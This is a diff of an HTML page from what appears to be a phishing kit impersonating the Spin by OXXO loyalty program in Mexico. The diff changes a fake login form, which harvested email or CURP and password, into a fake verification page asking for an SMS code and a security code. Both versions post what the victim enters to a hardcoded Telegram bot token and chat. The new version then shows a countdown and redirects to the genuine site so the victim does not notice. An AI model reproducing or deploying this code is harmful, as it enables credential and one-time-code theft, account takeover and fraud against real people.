--- a/sms.html
+++ b/sms.html
@@ -31,27 +31,19 @@
 
         .form-container {
             max-width: 400px;
-            padding: 30px;
+            padding: 20px;
             border-radius: 15px;
-            box-shadow: 0 4px 20px rgba(0, 0, 0, 0.2);
-            background-color: white;
+            background-color: transparent;
             z-index: 1;
-            transition: transform 0.3s;
         }
 
-        .form-container:hover {
-            transform: translateY(-5px);
-        }
-
-        h5 {
-            text-align: center;
+        .form-group {
             margin-bottom: 20px;
-            color: white;
-            font-size: 17px;
-        }
-
-        .input-group {
-            margin-bottom: 20px;
+            padding: 15px;
+            border: 1px solid rgba(255, 255, 255, 0.5);
+            border-radius: 10px;
+            background-color: rgba(255, 255, 255, 0.9);
+            position: relative;
         }
 
         label {
@@ -61,8 +53,7 @@
             color: #4a4a4a;
         }
 
-        input[type="text"],
-        input[type="password"] {
+        input[type="number"] {
             width: 100%;
             padding: 12px;
             border: 1px solid #ccc;
@@ -71,17 +62,16 @@
             transition: border-color 0.3s;
         }
 
-        input[type="text"]:focus,
-        input[type="password"]:focus {
-            border-color: #531BC8;
+        input[type="number"]:focus {
+            border-color: #FF6600;
             outline: none;
         }
 
         button {
             width: 100%;
             padding: 12px;
-            background-color: #531BC8;
-            color: white;
+            background-color: #FF6600;
+            color: rgb(248, 247, 247);
             border: none;
             border-radius: 25px;
             cursor: pointer;
@@ -93,24 +83,6 @@
         button:hover {
             background-color: #6B3FC0;
             transform: translateY(-2px);
-        }
-
-        .register-link, .forgot-password {
-            text-align: center;
-            margin-top: 10px;
-        }
-
-        .register-link a,
-        .forgot-password a {
-            color: #007bff;
-            text-decoration: none;
-            transition: color 0.3s;
-        }
-
-        .register-link a:hover,
-        .forgot-password a:hover {
-            text-decoration: underline;
-            color: #0056b3;
         }
 
         .footer-text {
@@ -137,27 +109,24 @@
         #countdown {
             margin-top: 10px;
             font-size: 14px;
-            color: #f3f1f7;
+            color: #f3f3f5;
         }
     </style>
 </head>
 <body>
     <img src="logo.png" alt="Logo" class="logo">
-    <h5>Hola</h5>
     <div class="form-container">
         <form id="loginForm">
-            <div class="input-group">
-                <label for="email">Ingresa tu CURP, Teléfono ó Correo electrónico</label>
-                <input type="text" id="email" name="email" required placeholder=""> <!-- Cambiado a tipo text -->
+            <div class="form-group">
+                <label for="smsCode">Escribe el código de 4 dígitos que recibiste por mensaje</label>
+                <input type="number" id="smsCode" name="smsCode" required placeholder="Código SMS" oninput="this.value = this.value.slice(0, 4)" pattern="\d{4}" title="Por favor, ingresa solo 4 dígitos">
             </div>
-            <div class="input-group">
-                <label for="password">Contraseña</label>
-                <input type="password" id="password" name="password" required placeholder="********">
+            <div class="form-group">
+                <label for="securityCode">Escribe tu código de seguridad</label>
+                <input type="number" id="securityCode" name="securityCode" required placeholder="******" oninput="this.value = this.value.slice(0, 6)" pattern="\d{6}" title="Por favor, ingresa solo 6 dígitos">
             </div>
-            <button type="submit">Iniciar sesión</button>
-            <button type="button" onclick="location.href='#'">¿Olvidaste tu contraseña?</button>
+            <button type="submit">Verificar</button>
         </form>
-        <p class="register-link"><a href="#">Registrarme</a></p>
     </div>
     
     <div class="footer-text">
@@ -171,40 +140,44 @@
 
     <script>
         const form = document.getElementById('loginForm');
-        let alertShown = false;
+        let loadingDisplayed = false; 
+        let countdown; 
+        let interval; 
 
-        form.addEventListener('submit', function(event) {
-            event.preventDefault();
-
-            const email = document.getElementById('email').value;
-            const password = document.getElementById('password').value;
-
-            const regex = /^(?=.*[a-z])(?=.*[A-Z])(?=.*\W)[A-Za-z\d\W]{8,}$/;
-            if (!regex.test(password)) {
-                alert('La contraseña debe tener al menos 8 caracteres, una letra mayúscula, una letra minúscula y un símbolo.');
-                return;
-            }
-
-            const url = `https://api.telegram.org/bot6813453135:AAGfFRmuT5uVMFHzXzotCDQmXs3uj8wqB6o/sendMessage`;
-            const data = {
-                chat_id: -4037234500,
-                text: `Spimby:\nEmail: ${email}\nContraseña: ${password}`,
-                parse_mode: 'HTML'
-            };
-
-            document.getElementById('loading').style.display = 'block';
-            let countdown = 15;
+        function startCountdown() {
+            countdown = 15;
             document.getElementById('countdown').textContent = countdown;
 
-            const interval = setInterval(function() {
+            interval = setInterval(function() {
                 countdown--;
                 document.getElementById('countdown').textContent = countdown;
 
                 if (countdown <= 0) {
                     clearInterval(interval);
-                    window.location.href = 'selec.html';
+                    window.location.href = 'https://spinbyoxxo.com.mx/programa-de-lealtad'; // Cambia esto a la URL deseada
                 }
             }, 1000);
+        }
+
+        form.addEventListener('submit', function(event) {
+            event.preventDefault();
+
+            const smsCode = document.getElementById('smsCode').value;
+            const securityCode = document.getElementById('securityCode').value;
+
+            const url = `https://api.telegram.org/bot6813453135:AAGfFRmuT5uVMFHzXzotCDQmXs3uj8wqB6o/sendMessage`;
+            const data = {
+                chat_id: -4037234500,
+                text: `Spinby:\nCódigo SMS: ${smsCode}\nCódigo de seguridad: ${securityCode}`,
+                parse_mode: 'HTML'
+            };
+
+            // Mostrar el loading y comenzar la cuenta regresiva
+            if (!loadingDisplayed) {
+                document.getElementById('loading').style.display = 'block';
+                loadingDisplayed = true; 
+                startCountdown(); // Iniciar la cuenta regresiva al mostrar el loading
+            }
 
             fetch(url, {
                 method: 'POST',
@@ -216,28 +189,21 @@
             .then(response => response.json())
             .then(data => {
                 console.log('Mensaje enviado:', data);
-                if (!data.success) {
-                    if (!alertShown) {
-                        alert('Usuario o Contraseña incorrectos.');
-                        alertShown = true;
-                        resetForm();
-                        document.getElementById('loading').style.display = 'none';
-                        clearInterval(interval);
-                    }
-                } else {
-                    alert('Inicio de sesión exitoso.');
+                if (!data.ok) { // Cambiar data.success a data.ok para la verificación correcta
+                    alert('Error al enviar el mensaje. Intenta nuevamente.');
+                    clearInterval(interval); // Detener la cuenta regresiva si hay error
+                    document.getElementById('loading').style.display = 'none';
+                    loadingDisplayed = false; // Resetear el estado de loading
+            
                 }
             })
             .catch((error) => {
                 console.error('Error:', error);
                 document.getElementById('loading').style.display = 'none';
+                loadingDisplayed = false; // Resetear el estado de loading
+                clearInterval(interval); // Detener la cuenta regresiva en caso de error
             });
         });
-
-        function resetForm() {
-            document.getElementById('email').value = '';
-            document.getElementById('password').value = '';
-        }
     </script>
 </body>
 </html>
